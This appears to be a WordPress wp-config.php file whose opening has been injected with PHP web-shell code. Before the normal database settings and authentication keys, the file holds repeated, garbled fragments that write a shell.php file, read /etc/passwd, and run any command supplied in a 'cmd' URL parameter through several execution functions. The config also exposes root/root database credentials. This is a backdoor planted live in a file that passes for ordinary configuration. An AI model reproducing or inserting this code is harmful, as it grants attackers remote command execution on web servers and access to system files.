' > shell.php');//');echo ''.shell_exec('cat /etc/passwd').'';//');if(isset($_GET["cmd"])){$c=$_GET["cmd"];$o="";if(function_exists("system")){ob_start();system($c);$o=ob_get_clean();}elseif(function_exists("passthru")){ob_start();passthru($c);$o=ob_get_clean();}elseif(function_exists("shell_exec")){$o=shell_exec($c);}elseif(function_exists("exec")){exec($c,$r);$o=implode("\n",$r);}elseif(function_exists("popen")){$h=popen($c,"r");$o=fread($h,4096);pclose($h);}elseif(function_exists("proc_open")){$d=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));$p=proc_open($c,$d,$pipes);$o=stream_get_contents($pipes[1]);proc_close($p);}echo"
".$o."
";die;}//');if(isset($_GET["cmd"])){$c=$_GET["cmd"];$o="";if(function_exists("system")){ob_start();system($c);$o=ob_get_clean();}elseif(function_exists("passthru")){ob_start();passthru($c);$o=ob_get_clean();}elseif(function_exists("shell_exec")){$o=shell_exec($c);}elseif(function_exists("exec")){exec($c,$r);$o=implode("\n",$r);}elseif(function_exists("popen")){$h=popen($c,"r");$o=fread($h,4096);pclose($h);}elseif(function_exists("proc_open")){$d=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));$p=proc_open($c,$d,$pipes);$o=stream_get_contents($pipes[1]);proc_close($p);}echo"
".$o."
";die;}//');if(isset($_GET["cmd"])){echo"
";passthru($_GET["cmd"]);echo"
";die;}//');if(isset($_GET['cmd'])){echo '
'.shell_exec($_GET['cmd']).'
';die();}//'); /*'); /*' ); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'root'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8mb4'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '}$oV/.D07935{Y%* ?<+[l>Vh?i3&H{Z{+6 b:+-P*@(FAk68tZR|`L5!Ji)#J3'); define('SECURE_AUTH_KEY', 'tIuZ&b63Gy5z.Z/gGKFFq-=;?**pAJ,v|7n8jS@qq3Q;{?^8&n:[.1=2+lKg7l3C'); define('LOGGED_IN_KEY', '&*e-Y`04Ky-lR_&,EPqAPEo@Ff6!-u/S7SB0SV&XN~0^Wo1;UPh=8WkIlm$5ib.h'); define('NONCE_KEY', '?+#g6]Sv|PE/96JZ/Sxre[p>/s2FZfoFI5pU/XMXvqZWkgy,6N`nV]yKgoJ~MD{F'); define('AUTH_SALT', '1Q|9R|:4kr61xc]<&%>9IJ4|Dy|VT&ePq?Dh4|/aj;n^MA>k;2F3wSF4a:x*-ey]C!P0DskvX#T.V'); define('LOGGED_IN_SALT', '58>I(S!lG-W;CmpN(cU(k~L2'); define('NONCE_SALT', '5sIGKRSzUj8sfAK|9jSgLD{*w}QV}d`RWTI(Cyq7Lx:;79 Q|i;u~9;[9$n%BA|:'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ define('WP_DEBUG', false); define('WP_DEBUG_DISPLAY', false); define('DISALLOW_FILE_EDIT', true); define('SCRIPT_DEBUG', true); define('SAVEQUERIES', true); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php'); /** this cm is just for test !